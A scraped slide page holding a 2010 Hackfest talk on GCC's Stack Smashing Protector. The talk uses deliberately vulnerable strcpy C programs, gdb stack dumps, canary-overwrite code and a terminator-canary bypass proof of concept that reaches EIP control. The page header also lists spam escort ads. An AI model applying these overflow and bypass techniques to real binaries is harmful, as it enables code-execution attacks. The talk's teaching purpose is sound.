Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 

Stack Smashing Protector (Paul Rascagneres)

  • 1. Stack Smashing Protector Stack Smashing Protector 06/11/2010 /* * ---------------------------------------------------------------------------- * "THE BEER-WARE LICENSE" (Revision 42): * <rootbsd@r00ted.com> wrote this file. As long as you retain this notice you * can do whatever you want with this stuff. If we meet some day, and you think * this stuff worth it, you can buy me a beer in return Paul Rascagneres. * ---------------------------------------------------------------------------- */ Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware - HACKFEST
  • 2. Stack Smashing Protector Contents 1. Introduction 2. Local variables reordering 3. Pointers reordering 4. Canary 4.1 What is it? How does it work? 4.2 Linux integration 4.3 FreeBSD integration 5. Exploitation with “Terminator” mode Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 3. Stack Smashing Protector 1. Introduction - GCC extension - To protect from stack smashing attacks - IBM - Developed since 2005 The protection is realized by : - local variables reordering - copying the pointers in function before local variable - canary insertion Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 4. Stack Smashing Protector 2. Local variables reordering Example of code : void check_password(char *pass) { int good=0; char password[10]; strcpy(password,pass); if (!strcmp(password,"passw0rd")) good=1; if ( good == 1 ) printf("Password OKn"); else printf("Password KOn"); } int main(int argc, char **argv) { if (argc != 2) return(1); check_password(argv[1]); } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 5. Stack Smashing Protector 2. Local variables reordering Compilation without SSP : $ gcc -g code1.c -o code1 $ gdb ./code1 (gdb) break 10 Breakpoint 1 at 0x8048423: file code1.c, line 10. (gdb) run AAAAAA Starting program: /root/pres/code1 AAAAAA Breakpoint 1, check_password (pass=0xbffffeab "AAAAAA") at code1.c:10 10 if (!strcmp(password,"passw0rd")) (gdb) x/x &good 0xbffffce4: 0x00000000 (gdb) x/x password 0xbffffcda: 0x41414141 (gdb) x/12x $esp 0xbffffcd0: 0xbffffcda 0xbffffeab 0x4141fe9a 0x41414141 0xbffffce0: 0xb7f9da00 0x00000000 0xbffffd08 0x0804849f 0xbffffcf0: 0xbffffeab 0x08049688 0xbffffd18 0xbffffd20 Green : password variable and Red : good variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 6. Stack Smashing Protector 2. Local variables reordering Variable smashing : $ gdb ./code1 (gdb) break 10 Breakpoint 1 at 0x8048423: file code1.c, line 10. (gdb) run AAAAAAAAAA$(perl -e 'print "x01"') Starting program: /root/pres/code1 AAAAAAAAAA$(perl -e 'print "x01"') Breakpoint 1, check_password (pass=0xbffffeab "AAAAAAAAAA001") at code1.c:10 10 if (!strcmp(password,"passw0rd")) (gdb) x/x &good 0xbffffce4: 0x00000001 (gdb) x/x password 0xbffffcda: 0x41414141 (gdb) x/12x $esp 0xbffffcd0: 0xbffffcda 0xbffffeab 0x4141fe9a 0x41414141 0xbffffce0: 0x41414141 0x00000001 0xbffffd08 0x0804849f 0xbffffcf0: 0xbffffeab 0x08049688 0xbffffd18 0xbffffd20 Green : password variable and Red : good variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 7. Stack Smashing Protector 2. Local variables reordering Variable smashing : - we can overwrite the variable and bypass the test $ ./code1 AAAAAA Password KO $ ./code1 passw0rd Password OK $ ./code1 AAAAAAAAAA$(perl -e 'print "x01"') Password OK Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 8. Stack Smashing Protector 2. Local variables reordering Compilation with SSP : $ gcc -g -fstack-protector-all code1.c -o code1-ssp $ gdb ./code1-ssp (gdb) break 10 Breakpoint 1 at 0x8048423: file code1.c, line 10. (gdb) run AAAAAA Starting program: /root/pres/code1-ssp AAAAAA Breakpoint 1, check_password (pass=0xbffffeab "AAAAAA") at code1.c:10 10 if (!strcmp(password,"passw0rd")) (gdb) x/x &good 0xbffffcc4: 0x00000000 (gdb) x/x password 0xbffffcca: 0x41414141 (gdb) x/24x $esp 0xbffffca0: 0xbffffcca 0xbffffea7 0x00000000 0x00000000 0xbffffcb0: 0x00000000 0xbffffea7 0x00000000 0x00000000 0xbffffcc0: 0x00000000 0x00000000 0x41410000 0x41414141 0xbffffcd0: 0x00000000 0xff0a0000 0xbffffd08 0x0804852f 0xbffffce0: 0xbffffea7 0x08049728 0xbffffcf8 0xbffffda4 0xbffffcf0: 0x00000002 0x08049728 0xbffffd18 0x08048579 Green : password variable and Red : good variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 9. Stack Smashing Protector 2. Local variables reordering With the SSP : - we cannot overwrite the variable and bypass the test - All buffers are above local variable in the stack $ ./code1-ssp AAAAAA Password KO $ ./code1-ssp passw0rd Password OK $ ./code1-ssp AAAAAAAAAA$(perl -e 'print "x01"') Password KO Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 10. Stack Smashing Protector 3. Pointers reordering Example of code : void function(char *one, char *two) { char buff[8]; strcpy(buff,one); } int main(int argc, char * argv[]) { function(argv[1],"BBBBBBB"); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 11. Stack Smashing Protector 3. Pointers reordering Compilation without SSP - 1/2: $ gcc -g code2.c -o code2 (gdb) run AAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/pres/code2 AAAAAAA Breakpoint 1, function (one=0xbffffeaa "AAAAAAA", two=0x80484c0 "BBBBBBB") at code2.c:5 6 } (gdb) x/24x $esp 0xbffffcd0: 0x00000000 0x00000000 0xbffffe99 0xb7eeffde 0xbffffce0: 0x41414141 0x00414141 0xbffffd08 0x080483e7 0xbffffcf0: 0xbffffeaa 0x080484c0 0xbffffd18 0x08048429 0xbffffd00: 0xb7ff2250 0xbffffd20 0xbffffd78 0xb7e98455 0xbffffd10: 0x08048410 0x080482f0 0xbffffd78 0xb7e98455 0xbffffd20: 0x00000002 0xbffffda4 0xbffffdb0 0xb7fe2b38 Green one pointer, Red two pointer and Blue buff variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 12. Stack Smashing Protector 3. Pointers reordering Compilation without SSP - 2/2: $ gcc -g code2.c -o code2 (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/pres/code2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, function (one=0xbffffeaa "Ax39", two=0x80484c0 "BBBBBBB") at code2.c:5 6 } (gdb) x/24x $esp 0xbffffcd0: 0x00000000 0x00000000 0xbffffe99 0xb7eeffde 0xbffffce0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcf0: 0x41414141 0x41414141 0xbffffd18 0x08048429 0xbffffd00: 0xb7ff2250 0xbffffd20 0xbffffd78 0xb7e98455 0xbffffd10: 0x08048410 0x080482f0 0xbffffd78 0xb7e98455 0xbffffd20: 0x00000002 0xbffffda4 0xbffffdb0 0xb7fe2b38 Green one pointer, Red two pointer and Blue buff variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 13. Stack Smashing Protector 3. Pointers reordering Pointers smashing : - we can overwrite pointers - we can arbitrary put our own pointers Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 14. Stack Smashing Protector 3. Pointers reordering Compilation with SSP : $ gcc -g -fstack-protector-all code2.c -o code2-ssp (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/pres/code2-ssp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, function (one=0xbffffe86 "Ax39", two=0x8048560 "BBBBBBB") at code2.c:5 6 } (gdb) x/24x $esp 0xbffffc90: 0xbffffcac 0xbffffe86 0x00000000 0x00000000 0xbffffca0: 0x08048560 0xbffffe86 0x00000000 0x41414141 0xbffffcb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcc0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcd0: 0x00414141 0x08049654 0xbffffcf8 0x080484c9 0xbffffce0: 0xff0a0000 0xbffffd00 0xbffffd58 0xb7e98455 Green one pointer, Red two pointer and Blue buff variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 15. Stack Smashing Protector 3. Pointers reordering With the SSP : - we cannot overwrite pointers - argument pointers are below variables Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 16. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? - canary is between local variable and saved EBP - if the canary is corrupted : the binary is brutally stopped ------------------------ | saved EIP | ------------------------ | saved EBP | ------------------------ | canary | ------------------------ | local variables | ------------------------ Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 17. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? 3 kinds of canary : - random - terminator (0xff0a0000) - null (0x00000000) Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 18. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? Get the canary (x86 only): $ cat get_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 19. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? Get the canary : $ cat get_canary.c $ gcc -g -fstack-protector-all get_canary.c -o get_canary $ ./get_canary AAAAAAAAA Canary = 0xff0a0000 Canary in terminator mode (gdb) run AAAAAAA Starting program: /root/pres/get_canary AAAAAAA Breakpoint 1, fun (arg=0xbffffea5 "AAAAAAA") at get_canary.c:8 8 printf("Canary = 0x"); (gdb) x/24x $esp 0xbffffc90: 0xbffffcba 0xbffffea5 0x00000000 0x00000000 0xbffffca0: 0x00000000 0xbffffea5 0x00000000 0x00000000 0xbffffcb0: 0x00000000 0x00000000 0x41410000 0x41414141 0xbffffcc0: 0x00000041 0xff0a0000 0xbffffcf8 0x08048526 0xbffffcd0: 0xbffffea5 0x08049710 0xbffffce8 0xbffffd94 0xbffffce0: 0x00000002 0x08049710 0xbffffd08 0x08048579 Green variable b, Red canary, Blue saved EBP and Pink saved EIP Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 20. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? What's happen if the canary is overwritten : (gdb) run AAAAAAAAAAAAA Starting program: /root/pres/get_canary AAAAAAAAAAAAAAAAAAAAA Breakpoint 1, fun (arg=0xbffffe9f 'A' <repeats 21 times>) at get_canary.c:8 8 printf("Canary = 0x"); (gdb) x/24x $esp 0xbffffc90: 0xbffffcba 0xbffffe9f 0x00000000 0x00000000 0xbffffca0: 0x00000000 0xbffffe9f 0x00000000 0x00000000 0xbffffcb0: 0x00000000 0x00000000 0x41410000 0x41414141 0xbffffcc0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcd0: 0xbffffe9f 0x08049710 0xbffffce8 0xbffffd94 0xbffffce0: 0x00000002 0x08049710 0xbffffd08 0x08048579 (gdb) cont Continuing. Canary = 0x00414141 *** stack smashing detected ***: /root/pres/get_canary terminated Green variable b, Red canary, Blue saved EBP and Pink saved EIP Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 21. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? - If the canary is overwritten or corrupted the binary is brutally stopped - binary doesn't jump to the saved EIP - stack smashing exploitation failed $ ./get_canary AAAAAAAAAAAAAAAAAAAAAAA Canary = 0x41414141 *** stack smashing detected ***: ./get_canary terminated FreeBSD canary type is random : $ ./get_canary AAAA Canary = 0x8fb1bb41 $ ./get_canary AAAA Canary = 0xa4c64939 $ ./get_canary AAAA Canary = 0x035ea454 Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 22. Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? How to know if SSP is active on a binary ? $ readelf -s ./get_canary | grep stack 6: 00000000 32 FUNC GLOBAL DEFAULT UND __stack_chk_fail@GLIBC_2.4 (3) 74: 00000000 32 FUNC GLOBAL DEFAULT UND __stack_chk_fail@@GLIBC_2 $ objdump -s ./get_canary | grep stack 804824c 5f5f7374 61636b5f 63686b5f 6661696c __stack_chk_fail Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 23. Stack Smashing Protector 4. Canary 4.2. Linux integration Get the canary (x86 only): $ cat get_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 24. Stack Smashing Protector 4. Canary 4.2. Linux integration What are the differences between SSP and no-SSP compilations : $ gcc -fstack-protector-all -g get_canary.c -o get_canary $ ./get_canary AAA Canary = 0x97c593e9 $ ./get_canary AAA Canary = 0x8562009f Random canary $ gcc -fstack-protector-all -g get_canary.c -S $ mv get_canary.s get_canary.SSP.s $ gcc -g get_canary.c -S $ diff get_canary.c get_canary.SSP.s > movl 44(%esp), %edx > xorl %gs:20, %edx > je .L9 > call __stack_chk_fail Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 25. Stack Smashing Protector 4. Canary 4.2. Linux integration What does this ASM code mean ? It compares the canary value with register %GS at offset 0x14. If it is not the same it executes : __stack_chk_fail This function stop the binary execution. Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 26. Stack Smashing Protector 4. Canary 4.2. Linux integration Code to validate the previous slide : typedef unsigned long can_t; #define can_fmt "%0lx" #define get_canary(can) asm volatile("mov %%gs:(0x14), %0" : "=r" (can)); int fun(char *arg) { int i, char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { can_t can; get_canary(can); printf("Register GS at offset 0x14 : " can_fmt "n", can); if(argc>1) fun(argv[1]); return 0;} Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 27. Stack Smashing Protector 4. Canary 4.2. Linux integration Test : $ gcc -fstack-protector-all -g get_canary2.c -o get_canary2 $ ./get_canary2 AA Register GS at offset 0x14 : 305f1b54 Canary = 0x305f1b54 $ ./get_canary2 AA Register GS at offset 0x14 : d9b5db15 Canary = 0xd9b5db15 It works... ... but, how is the register set ?!?! Nothing in the binary ?!?! Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 28. Stack Smashing Protector 4. Canary 4.2. Linux integration The register is set by the kernel : $ grep '%%gs' arch/x86/include/asm/stackprotector.h asm volatile (“mov %0, %%gs” : : “r” (0)); How to overwrite register GS and put our own canary ? Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 29. Stack Smashing Protector 4. Canary 4.2. Linux integration #define set() asm volatile("mov %0, %%gs:(0x14)" :: "r" (0x41414141)); int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) { set(); fun(argv[1]); } return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 30. Stack Smashing Protector 4. Canary 4.2. Linux integration $ ./set_canary AAA Canary = 0x41414141 *** stack smashing detected ***: ./set_canary terminated $ ctf:~/pres# ./set_canary AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Canary = 0x41414141 Segmentation fault We made our own canary. Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 31. Stack Smashing Protector 4. Canary 4.2. Linux integration Summary : - kernel sets register GS at offset 0x14 - binary saves it between variable and saved EBP - binary runs - binary compares the canary and the register - binary stops its execution if values are not the same Why random canary or terminator canary on Linux ?? - it depends on glibc compilation - terminator by default - random if compiled with –enable-stackguard-randomization Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 32. Stack Smashing Protector 4. Canary 4.2. FreeBSD integration Get the canary (x86 only): $ cat get_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 33. Stack Smashing Protector 4. Canary 4.3. FreeBSD integration Canary is generated by __guard_setup() /usr/src/contrib/gcclibs/libssp/ssp.c => static void __attribute__ ((constructor)) __guard_setup (void); The function creates a static variable with the canary inside Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 34. Stack Smashing Protector 4. Canary 4.3. FreeBSD integration The canary is in the .bss section : $ readelf -a ./get_canary | grep bss [22] .bss NOBITS 080497f8 0007f8 000028 00 WA 0 0 8 .bss address : 0x08497F8 (gdb) break 13 Breakpoint 1 at 0x8048573: file get_canary.c, line 13. (gdb) run AAAA Starting program: get_canary AAAA Canary = 0xae0ea9fd Breakpoint 1, fun (arg=0xbfbfea4e "AAAA") at get_canary.c:13 13 } (gdb) x/10x 0x080497f8 0x80497f8 <__stack_chk_guard@@FBSD_1.0>: 0xae0ea9fd 0xbbbffda5 0xdab8440a 0x349ec6b5 0x8049808 <__stack_chk_guard@@FBSD_1.0+16>: 0x6a82af9f 0xcf2be5cc 0x0d069c6e 0x75ca1bf4 0x8049818 <completed.4782>: 0x00000000 0xbfbfe86c How to set our own canary in .bss section ? Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 35. Stack Smashing Protector 4. Canary 4.3. FreeBSD integration $ cat set_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { memcpy( (char *)(0x080497f8), “AAAA” , 5); if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 36. Stack Smashing Protector 4. Canary 4.3. FreeBSD integration $ ./set_canary AAAA Canary = 0x41414141 Abort trap: 6 (core dumped) $ ./set_canary AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Canary = 0x41414141 Segmentation fault: 11 (core dumped) Our canary is placed between local variable and the saved EBP Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 37. Stack Smashing Protector 4. Canary 4.3. FreeBSD integration Summary : - __guard_setup() initializes canary in .bss section - binary saves it between variable and saved EBP - binary runs - binary compares the canary and the static variable (.bss) - binary stops its execution if values are not the same Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 38. Stack Smashing Protector 4. Exploitation with “Terminator” mode Code for the poc : int funk(char *one, char *two, char *three) { char var_one[8]; char var_two[8]; char var_three[8]; strcpy(var_one, one); strcpy(var_two, two); strcpy(var_three, three); return(0); } int main(int argc, char *argv[]) { if (argc <4) { printf("Usage: one two threen"); exit(1); } funk(argv[1], argv[2], argv[3]); } $ gcc -g -fstack-protector-all poc.c -o poc Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 39. Stack Smashing Protector 4. Exploitation with “Terminator” mode (gdb) b 14 (gdb) run `perl -e 'print "AAAAAAA"'` "BBBBBBB" "CCCCCCC" Starting program: ./poc `perl -e 'print "AAAAAAA"'` "BBBBBBB" "CCCCCCC" Breakpoint 1, funk (one=0xbfe86abc "AAAAAAA", two=0xbfe86ac5 "BBBBBBB", three=0xbfe86ace "CCCCCCC") at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbfe859a0: 0xbfe859bc 0xbfe86ace 0x00000000 0xbfe86ace 0xbfe859b0: 0xbfe86ac5 0xbfe86abc 0x00000000 0x43434343 0xbfe859c0: 0x00434343 0x42424242 0x00424242 0x41414141 0xbfe859d0: 0x00414141 0xff0a0000 0xbfe85a08 0x0804853b 0xbfe859e0: 0xbfe86abc 0xbfe86ac5 0xbfe86ace 0x08048334 0xbfe859f0: 0xb7f56ff4 0x08049714 0xbfe85a20 0x08048579 0xbfe85a00: 0xbfe85a20 0xb7f56ff4 0xbfe85a78 0xb7e16455 0xbfe85a10: 0x08048560 0x080483b0 0xbfe85a78 0xb7e16455 Blue three variable, Green two , Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 40. Stack Smashing Protector 4. Exploitation with “Terminator” mode Overflow test : (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa BBBBBBBBBBBBB CCCCCCCCCCCCCCC Starting program: ./poc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa BBBBBBBBBBBBB CCCCCCCCCCCCCCC Breakpoint 1, funk (one=0xbf91ca96 'A' <repeats 33 times>, "a", two=0xbf91cab9 'B' <repeats 13 times>, three=0xbf91cac7 'C' <repeats 15 times>) at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbfe859a0: 0xbfe859bc 0xbfe86ace 0x00000000 0xbfe86ace 0xbfe859b0: 0xbfe86ac5 0xbfe86abc 0x00000000 0x43434343 0xbfe859c0: 0x43434343 0x42424200 0x42424242 0x41414141 0xbfe859d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfe859e0: 0x41414141 0x41414141 0xbfe86ace 0x08048334 0xbfe859f0: 0xb7f56ff4 0x08049714 0xbfe85a20 0x08048579 0xbfe85a00: 0xbfe85a20 0xb7f56ff4 0xbfe85a78 0xb7e16455 0xbfe85a10: 0x08048560 0x080483b0 0xbfe85a78 0xb7e16455 (gdb) cont Continuing. *** stack smashing detected ***: ./poc terminated Blue three variable, Green two, Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 41. Stack Smashing Protector 4. Exploitation with “Terminator” mode Fix the canary : (gdb) run "`perl -e 'print "AAAAAAAA" . "x00x00x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBBB" "CCCCCCCC" Starting program: ./poc "`perl -e 'print "AAAAAAAA" . "x00x00x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBB" "CCCCCCC" Breakpoint 1, funk (one=0xbfe9faad "AAAAAAAAnÿ", 'A' <repeats 13 times>, two=0xbfe9fac5 "BBBBBBBB", three=0xbfe9face "CCCCCCCC") at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x43434343 0xbfe9d8f0: 0x00434343 0x42424242 0x00424242 0x41414141 0xbfe9d900: 0x00414141 0xff0a0000 0xbfe85a08 0x0804853b 0xbfe9d910: 0xbfe86abc 0xbfe9fac5 0xbfe9face 0x08048334 0xbfe9d920: 0xb7f10ff4 0x08049714 0xbfe9d950 0x08048579 0xbfe9d930: 0xbfe9d950 0xb7f10ff4 0xbfe9d9a8 0xb7dd0455 0xbfe9d940: 0x08048560 0x080483b0 0xbfe9d9a8 0xb7dd0455 Blue three variable, Green two, Red one and Pink the canary The saved ESP is not overwritten by 0x41414141 !!!! WTF !?!? Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 42. Stack Smashing Protector 4. Exploitation with “Terminator” mode - the canary value is not fortuity choice… - strcpy() stop at first x00 and canary is not overwritten - How to bypass it ? With imagination !!! Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
  • 43. Stack Smashing Protector 4. Exploitation with “Terminator” mode Fix the canary (the good way) : (gdb) run "`perl -e 'print "AAAAAAAAAA" . "x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBBBBBBBBBBBB" "CCCCCCCCCCCCCCCCCCCCCCCC" Starting program: ./poc "`perl -e 'print "AAAAAAAAAA" . "x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBBBBBBBBBBBB" "CCCCCCCCCCCCCCCCCCCCCCCC" Breakpoint 1, funk (one=0xbf9afa92 "AAAAAAAAAAnÿ", 'A' <repeats 13 times>, two=0xbf9afaac 'B' <repeats 17 times>, three=0xbf9afabe 'C' <repeats 24 times>) at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbf9ade60: 0xbf9ade7c 0xbf9afabe 0x00000000 0xbf9afabe 0xbf9ade70: 0xbf9afaac 0xbf9afa92 0x00000000 0x43434343 0xbf9ade80: 0x43434343 0x43434343 0x43434343 0x43434343 0xbf9ade90: 0x43434343 0xff0a0000 0x41414141 0x41414141 0xbf9adea0: 0x41414141 0xbf9a0041 0xbf9afabe 0x08048334 0xbf9adeb0: 0xb7f9bff4 0x08049714 0xbf9adee0 0x08048579 0xbf9adec0: 0xbf9adee0 0xb7f9bff4 0xbf9adf38 0xb7e5b455 (gdb) cont Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () Blue three variable, Green two, Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
